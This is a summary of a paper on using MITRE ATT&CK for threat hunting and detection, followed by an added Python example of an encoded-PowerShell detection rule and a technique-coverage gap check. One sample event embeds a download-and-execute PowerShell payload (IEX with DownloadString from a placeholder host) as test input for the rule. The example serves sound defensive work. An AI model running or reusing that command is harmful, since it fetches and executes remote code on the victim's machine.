MITRE ATT&CK is a normalised, structured approach to classifying and describing the methods adversaries use to attack systems, based on real-world observations.
Attackers and defenders constantly respond to each other, so what works today might not tomorrow. MITRE says it works with the community to keep ATT&CK up to date with the ever-changing threat landscape.
This paper introduces ATT&CK and related tools and resources. It also discusses how to make practical use of ATT&CK with a focus on threat hunting and detection.
ATT&CK can help perform gap analysis of malicious behaviour, enhance threat detection and test detection rules to provide assurance.
Detection, page 9
Preventing attackers from using techniques is critical. Implementing detective controls is also important because 1) defence-in-depth requires layered defences against any given threat (never put all your eggs in one basket), and 2) as mentioned earlier, you can’t prevent all techniques. To support this, ATT&CK provides extensive guidance on how to detect the use of techniques by attackers with the logs and other sources of security analytics at your disposal.
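As an added example (not code from the paper or from MITRE), the following Python shows the two practical uses the paper singles out: a detection rule mapped to an ATT&CK technique ID (T1059.001, Command and Scripting Interpreter: PowerShell) run over process-creation events, and a gap check listing in-scope techniques that no rule covers. The event schema, field names, sample command lines and the list of in-scope techniques are constructed for illustration and are not any vendor's or MITRE's format.

```python
"""Constructed example: an ATT&CK-mapped detection rule plus a coverage gap check.

All events, field names and rule logic are assumptions for illustration only.
"""
import base64
import re
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass(frozen=True)
class Rule:
    technique_id: str              # ATT&CK technique the rule is mapped to
    name: str
    matches: Callable[[dict], bool]


# PowerShell accepts abbreviations of -EncodedCommand; the payload is base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_encoded_powershell(event: dict) -> bool:
    """Rule logic: powershell.exe started with an encoded command line."""
    return (event["image"].lower().endswith("powershell.exe")
            and ENCODED_FLAG.search(event["cmdline"]) is not None)


RULES = [
    Rule("T1059.001", "PowerShell launched with an encoded command", is_encoded_powershell),
]


def run_rules(events: List[dict], rules: List[Rule] = RULES) -> List[dict]:
    """Apply every rule to every event; each detection carries its technique ID."""
    detections = []
    for ev in events:
        for rule in rules:
            if rule.matches(ev):
                detections.append({
                    "host": ev["host"],
                    "technique_id": rule.technique_id,
                    "rule": rule.name,
                    # Surface what actually ran so a hunter can triage without re-decoding.
                    "decoded": decode_encoded_command(ev["cmdline"]),
                })
    return detections


def coverage_gaps(techniques_in_scope: List[str], rules: List[Rule] = RULES) -> List[str]:
    """Gap analysis: in-scope techniques that no rule is mapped to."""
    covered = {r.technique_id for r in rules}
    return sorted(t for t in techniques_in_scope if t not in covered)


# Constructed sample events in an assumed, simplified process-creation schema.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_EVENTS = [
    {"host": "ws01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
                + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()},
    {"host": "ws02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service"},
    {"host": "ws03",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
]

# Assumed list of techniques this team has decided it must cover.
IN_SCOPE = ["T1059.001", "T1003.001", "T1053.005"]

if __name__ == "__main__":
    for d in run_rules(SAMPLE_EVENTS):
        print(d)
    print("uncovered techniques:", coverage_gaps(IN_SCOPE))
```

Feeding a known-bad event such as the first sample through the rule is the "test detection rules to provide assurance" step: if the rule stops firing after a logging or parser change, the gap shows up before an attacker finds it. Note that `-ExecutionPolicy` does not trip the encoded-command pattern because the regex requires whitespace and a base64 blob after the flag.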